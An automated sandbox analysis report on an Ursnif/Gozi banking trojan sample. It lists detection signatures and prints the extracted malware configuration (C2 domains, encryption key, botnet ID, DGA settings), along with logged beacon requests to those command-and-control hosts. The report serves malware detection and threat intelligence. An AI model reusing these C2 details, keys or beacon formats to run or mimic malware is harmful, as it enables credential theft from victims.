Windows Analysis Report FpYf5EGDO9.exe

Overview

General Information

Sample Name: FpYf5EGDO9.exe
Analysis ID: 527488
MD5: 2f1743897afa6f586ae97f53bf55c14e
SHA1: 21a51f4a3fa0c65509a1c7ef640f7e6b779aee49
SHA256: 440c297bcaa0e4ca3d84281d524b8351ad1ea2b5aabb22795db824a356cd54bd
Tags: exe, Gozi, ISFB, Ursnif
Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Found malware configuration
Sigma detected: Powershell run code from registry
Multi AV Scanner detection for submitted file
Sigma detected: Encoded IEX
Tries to steal Mail credentials (via file / registry access)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Modifies the prolog of user mode functions (user mode inline hooks)
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the import address table of user mode modules (user mode IAT hooks)
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info

Classification

AV Detection:

Found malware configuration
Source: 00000000.00000002.510101213.0000000002140000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif
    {
      "RSA Public Key": "dm+RfNkITE5FceWriGPYkZaFfoP/k2XQ2jeLd8rNgFw6gJ6fNWsHd0U6akxsQHth/SBWm4/eMI9Y1qgwNJteasgQsUC7Ht20y96mIxH1hvPh9uvLSH5z2CNo+fcP8K+V0yoOOQzDln/qE7mMJHLu+rmogHE7S6lb7FVy/7xxrRe3zMDt5K9bDwOreWw0blGE",
      "c2_domain": ["yahoo.com", "soderunovos.website", "qoderunovos.website", "https://soderunovos.website", "https://qoderunovos.website"],
      "botnet": "4482",
      "server": "12",
      "serpent_key": "10291029JSJUYNHG",
      "sleep_time": "10",
      "CONF_TIMEOUT": "20",
      "SetWaitableTimer_value": "0",
      "dga_base_url": "constitution.org/usdeclar.txt",
      "dga_tld": "com ru org",
      "DGA_count": "10"
    }
Multi AV Scanner detection for submitted file
Source: FpYf5EGDO9.exe Virustotal: Detection: 46%
Machine Learning detection for sample
Source: FpYf5EGDO9.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.FpYf5EGDO9.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen7
Source: 0.2.FpYf5EGDO9.exe.2140e50.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.FpYf5EGDO9.exe.2150000.0.unpack Avira: Label: TR/Patched.Ren.Gen

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Unpacked PE file: 0.2.FpYf5EGDO9.exe.400000.0.unpack
Uses 32bit PE files
Source: FpYf5EGDO9.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 74.6.143.26:443 -> 192.168.2.3:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.100.216:443 -> 192.168.2.3:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 89.44.9.140:443 -> 192.168.2.3:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.3:49817 version: TLS 1.2
Source: unknown HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.3:49818 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.3:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 212.82.100.140:443 -> 192.168.2.3:49821 version: TLS 1.2
Source: Binary string: .C:\Users\user\AppData\Local\Temp\4v5gswf4.pdb source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\4v5gswf4.pdbXP source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp
Source: Binary string: SC:\gapajoxo-luhibomihi za.pdbP+CD source: FpYf5EGDO9.exe
Source: Binary string: C:\gapajoxo-luhibomihi za.pdb source: FpYf5EGDO9.exe
Source: Binary string: ntdll.pdb source: FpYf5EGDO9.exe, 00000000.00000003.458681957.0000000005D50000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: FpYf5EGDO9.exe, 00000000.00000003.458681957.0000000005D50000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\i1aaekli.pdb source: powershell.exe, 0000000E.00000002.590639322.000001A9845B8000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\i1aaekli.pdbXP source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_0374A2FE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 44_2_0374A2FE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_0373E9AC memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, 44_2_0373E9AC

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: lycos.com
Source: C:\Windows\explorer.exe Domain query: mail.yahoo.com
Source: C:\Windows\explorer.exe Domain query: login.yahoo.com
Source: C:\Windows\explorer.exe Domain query: www.lycos.com
Uses nslookup.exe to query domains
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
May check the online IP address of the machine
Source: C:\Windows\System32\nslookup.exe DNS query: name: myip.opendns.com
Source: C:\Windows\System32\nslookup.exe DNS query: name: myip.opendns.com
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
    GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: yahoo.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Connection: Keep-Alive
    Cache-Control: no-cache
    Host: www.yahoo.com
    Cookie: B=emaekhlgpqi05&b=3&s=ke
Source: global traffic HTTP traffic detected:
    GET /jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/FQ3LtU8rWKiGuaw8/NuVUF4C1kJEvzo9/4q_2FzKx_2BoAuXF6T/M0a9puLXo/g7QZ3Z41pnSqstIxrJFr/XQfDXm0MsROvBP6zJyK/pIVUVQiiCBcAOAJCd7Rzb1/y_2BZhUKXYwpc/xuZh04Cte3g_2F/_2Bc.crw HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: soderunovos.website
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /jdraw/8_2FELbHd/vcKlysS2_2B8o4xm4kBA/fbRTQSqR8KhaRfcmG4D/_2BYwGT6a_2BctWO8vLxko/alAFtnlNlG6Q7/I30RLNMi/fUrGHRWZ_2Br2a8odLCOSy2/Pp0uf39xNF/zw_2Bgb01eHiph9fS/HUtF_2BI_2FW/KJsziSAbwfK/PI_2FrcgGvn_2F/if7htk49j1cWEP5dTbASH/YfWHdUallNi/oU.crw HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: soderunovos.website
    Connection: Keep-Alive
    Cache-Control: no-cache
    Cookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
Source: global traffic HTTP traffic detected:
    GET /jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/rat2KiIdmFuMYJV01lFIUuv/pv1M_2F42q/2ghlrrK6HyvaK1iGn/6FWd3U6RwdJs/DwljQfV1T1s/A2jFEhH_2FVbra/gemmgKqmTU3dGSSrHsVgF/6KFwQzXOgNC787ml/o9EUNqnCP/_2FVV.crw HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: soderunovos.website
    Connection: Keep-Alive
    Cache-Control: no-cache
    Cookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
Source: global traffic HTTP traffic detected:
    GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
    Host: lycos.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
    Connection: Keep-Alive
    Cache-Control: no-cache
    Host: www.lycos.com
Source: global traffic HTTP traffic detected:
    GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg/ HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
    Connection: Keep-Alive
    Cache-Control: no-cache
    Host: www.lycos.com
Source: global traffic HTTP traffic detected:
    GET /images/ULsdPIVaor8tHILk/0ulmqbrH6ITnKv9/hjuxJRtL9AnqjM_2F9/31KQzlJ4A/RADn_2B9K7qN4OIWzhqt/e9pg3qo9NJvDplsJyu_/2BINJhitzziIxZ5FGe3dQs/qXLEJMLfrql94/pbynvtsD/hbcZQz4rDORcqa20GNWm_2B/AEaRjxdvZi/WJoDjLGRG7wMNfA10/47LdHNX1Ihp_/2F5oAPCKnfW/OXUd0uJQ9lRCE3/_2Bk_2BnDXgKUHje_2FRL/1haIbjYdfbhVAxGo/8KwtG_2Fq/c.gif HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
    Host: mail.yahoo.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2FULsdPIVaor8tHILk%2F0ulmqbrH6ITnKv9%2FhjuxJRtL9AnqjM_2F9%2F31KQzlJ4A%2FRADn_2B9K7qN4OIWzhqt%2Fe9pg3qo9NJvDplsJyu_%2F2BINJhitzziIxZ5FGe3dQs%2FqXLEJMLfrql94%2FpbynvtsD%2FhbcZQz4rDORcqa20GNWm_2B%2FAEaRjxdvZi%2FWJoDjLGRG7wMNfA10%2F47LdHNX1Ihp_%2F2F5oAPCKnfW%2FOXUd0uJQ9lRCE3%2F_2Bk_2BnDXgKUHje_2FRL%2F1haIbjYdfbhVAxGo%2F8KwtG_2Fq%2Fc.gif HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
    Connection: Keep-Alive
    Cache-Control: no-cache
    Host: login.yahoo.com
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: M247GB
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 89.44.9.140
Source: Joe Sandbox View IP Address: 74.6.143.26
Source: FpYf5EGDO9.exe, 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, cmd.exe, 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: FpYf5EGDO9.exe, 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, cmd.exe, 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000E.00000003.441167820.000001A9988C5000.00000004.00000001.sdmp String found in binary or memory: http://crl.micro
Source: FpYf5EGDO9.exe, 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, cmd.exe, 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.cmg
Source: RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.co/xa
Source: RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.ux
Source: RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.uxs
Source: RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobp/
Source: RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobp/3
Source: RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp String found in binary or memory: http://ns.micro/1
Source: RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp String found in binary or memory: http://ns.micro/1S
Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000E.00000002.546951449.000001A980439000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000E.00000002.545761231.000001A980231000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000E.00000002.546951449.000001A980439000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lan
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=8vo
Source: powershell.exe, 0000000E.00000002.546951449.000001A980439000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: FpYf5EGDO9.exe, 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp String found in binary or memory: https://qoderunovos.website
Source: FpYf5EGDO9.exe, 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp String found in binary or memory: https://soderunovos.website
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: https://soderunovos.website/
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: https://soderunovos.website/jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/FQ3L
Source: FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmp String found in binary or memory: https://soderunovos.website/jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: https://soderunovos.website/jdraw/8_2FELbHd/vcKlysS2_2B8o4xm4kBA/fbRTQSqR8KhaRfcmG4D/_2BYwGT6a_2BctW
Source: FpYf5EGDO9.exe, 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp String found in binary or memory: https://soderunovos.websitehttps://qoderunovos.websiteo
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com/
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com//
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fj
Source: FpYf5EGDO9.exe, 00000000.00000003.351362297.0000000002289000.00000004.00000001.sdmp, FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fHHAQ457B0GtLskLkv%2fZiz
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com/R
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqc
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com/u
Source: FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmp String found in binary or memory: https://yahoo.com/
Source: FpYf5EGDO9.exe, 00000000.00000002.510452658.0000000002219000.00000004.00000001.sdmp String found in binary or memory: https://yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHL
Source: unknown DNS traffic detected: queries for: yahoo.com
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C45988 ResetEvent,ResetEvent,lstrcat,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError, 0_2_03C45988
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    date: Tue, 23 Nov 2021 19:59:01 GMT
    p3p: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
    cache-control: private
    x-content-type-options: nosniff
    content-type: text/html; charset=UTF-8
    x-envoy-upstream-service-time: 14
    server: ATS
    Content-Length: 1052
    Age: 1
    Connection: close
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.com https://*.oath.com https://*.search.yahoo.com https://*.search.aol.com https://*.search.huffpost.com https://*.verizonmedia.com https://*.publishing.oath.com https://*.autoblog.com; sandbox allow-forms allow-same-origin allow-scripts allow-popups allow-popups-to-escape-sandbox allow-presentation; report-uri https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=8voena9gpqi06&partner=;
    X-Frame-Options: SAMEORIGIN
    X-XSS-Protection: 1; mode=block
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Tue, 23 Nov 2021 20:01:39 GMT
    Server: Apache
    Content-Security-Policy: frame-ancestors 'self' *.lycos.com
    X-Powered-By: PHP/7.2.24
    Connection: close
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: *.www.yahoo.com equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: *.www.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: *.www.yahoo.comT equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: +www.yahoo.co equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: +www.yahoo.com equals www.yahoo.com (Yahoo)
